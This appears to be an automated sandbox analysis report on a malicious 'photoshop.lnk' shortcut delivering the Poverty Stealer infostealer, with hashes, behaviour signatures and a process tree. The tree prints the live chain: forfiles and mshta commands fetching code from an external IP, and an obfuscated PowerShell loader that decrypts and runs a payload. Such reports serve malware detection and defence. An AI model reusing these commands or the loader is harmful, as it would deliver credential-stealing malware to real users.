Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
  • submitted
    04-03-2024 20:17

General

  • Target
    photoshop.lnk
  • Size
    1KB
  • MD5
    e0c8dc3509ab18f1feae1a35ee36a82a
  • SHA1
    46560534976b84abe00123d821fbdfab148403e4
  • SHA256
    704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419
  • SHA512
    171db39c91a149735316379111572e267ab874cbf3925956afcc0fc2a1e0a57825f096aaf6d43fc5de03f6cce2822131ff9bf7c72204a7d8d38bd32a32844392

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.92.251.35/Downloads/Lar/photoshop

Signatures

  • Detect Poverty Stealer Payload 1 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        start mshta http://91.92.251.35/Downloads/Lar/photoshop
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop
          4⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3076
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = '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';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -
            5⤵
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2336
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
              6⤵
              • UAC bypass
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4932
              • C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
                "C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"
                7⤵
                • Executes dropped EXE
                • Checks processor information in registry
                • Enumerates system info in registry
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2440
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1860
                  8⤵
                  • Program crash
                  PID:3860
              • C:\Users\Admin\AppData\Roaming\Lyrufos.exe
                "C:\Users\Admin\AppData\Roaming\Lyrufos.exe"
                7⤵
                • Executes dropped EXE
                PID:3168
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 2440
    1⤵
    PID:380

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize
      2KB
      MD5
      d85ba6ff808d9e5444a4b369f5bc2730
      SHA1
      31aa9d96590fff6981b315e0b391b575e4c0804a
      SHA256
      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
      SHA512
      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize
      64B
      MD5
      3ca1082427d7b2cd417d7c0b7fd95e4e
      SHA1
      b0482ff5b58ffff4f5242d77330b064190f269d3
      SHA256
      31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
      SHA512
      bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itd2eveg.3wy.ps1
      Filesize
      60B
      MD5
      d17fe0a3f47be24a6453e9ef58c94641
      SHA1
      6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256
      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
      SHA512
      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\CCDInstaller.js
      Filesize
      1.2MB
      MD5
      e96bb3da47f4a3319b80f23051bdeb16
      SHA1
      c9913b052c5c7a59e100fe18357fddc1023161ea
      SHA256
      d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29
      SHA512
      6ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e

    • C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\index.html
      Filesize
      426B
      MD5
      a28ab17b18ff254173dfeef03245efd0
      SHA1
      c6ce20924565644601d4e0dd0fba9dde8dea5c77
      SHA256
      886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375
      SHA512
      9371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6

    • C:\Users\Admin\AppData\Roaming\Lyrufos.exe
      Filesize
      29KB
      MD5
      16db89328ce227006c153728c0ade1ae
      SHA1
      effd7c2992e64fa2d266b92054d3dee5f1e950f5
      SHA256
      69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab
      SHA512
      6e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5

    • C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
      Filesize
      2.9MB
      MD5
      c56adb18f4440a6c085141c508256cbd
      SHA1
      9ac2fef2d12260c1e717d8de61b8a42840a1cac4
      SHA256
      1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a
      SHA512
      4457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429

    • C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
      Filesize
      1.8MB
      MD5
      b6f4b0ce8d68fa8a3d2ed69a50f4a8da
      SHA1
      c8037db70d2c53f0efbc746efabf7968d6d09e1a
      SHA256
      796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead
      SHA512
      7d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2

    • memory/2336-33-0x000001C28C120000-0x000001C28C130000-memory.dmp
      Filesize
      64KB

    • memory/2336-32-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
      Filesize
      10.8MB

    • memory/2336-34-0x000001C28C120000-0x000001C28C130000-memory.dmp
      Filesize
      64KB

    • memory/2336-36-0x000001C28C120000-0x000001C28C130000-memory.dmp
      Filesize
      64KB

    • memory/2336-73-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
      Filesize
      10.8MB

    • memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp
      Filesize
      9.3MB

    • memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp
      Filesize
      9.3MB

    • memory/3168-102-0x00000000005F0000-0x00000000005F1000-memory.dmp
      Filesize
      4KB

    • memory/4468-11-0x00000231472E0000-0x00000231472F0000-memory.dmp
      Filesize
      64KB

    • memory/4468-16-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp
      Filesize
      10.8MB

    • memory/4468-10-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp
      Filesize
      10.8MB

    • memory/4468-0-0x0000023147190000-0x00000231471B2000-memory.dmp
      Filesize
      136KB

    • memory/4468-12-0x00000231472E0000-0x00000231472F0000-memory.dmp
      Filesize
      64KB

    • memory/4468-13-0x00000231472E0000-0x00000231472F0000-memory.dmp
      Filesize
      64KB

    • memory/4932-50-0x000001833AAF0000-0x000001833AB66000-memory.dmp
      Filesize
      472KB

    • memory/4932-49-0x000001833A6C0000-0x000001833A704000-memory.dmp
      Filesize
      272KB

    • memory/4932-47-0x0000018320040000-0x0000018320050000-memory.dmp
      Filesize
      64KB

    • memory/4932-48-0x0000018320040000-0x0000018320050000-memory.dmp
      Filesize
      64KB

    • memory/4932-71-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
      Filesize
      10.8MB

    • memory/4932-46-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
      Filesize
      10.8MB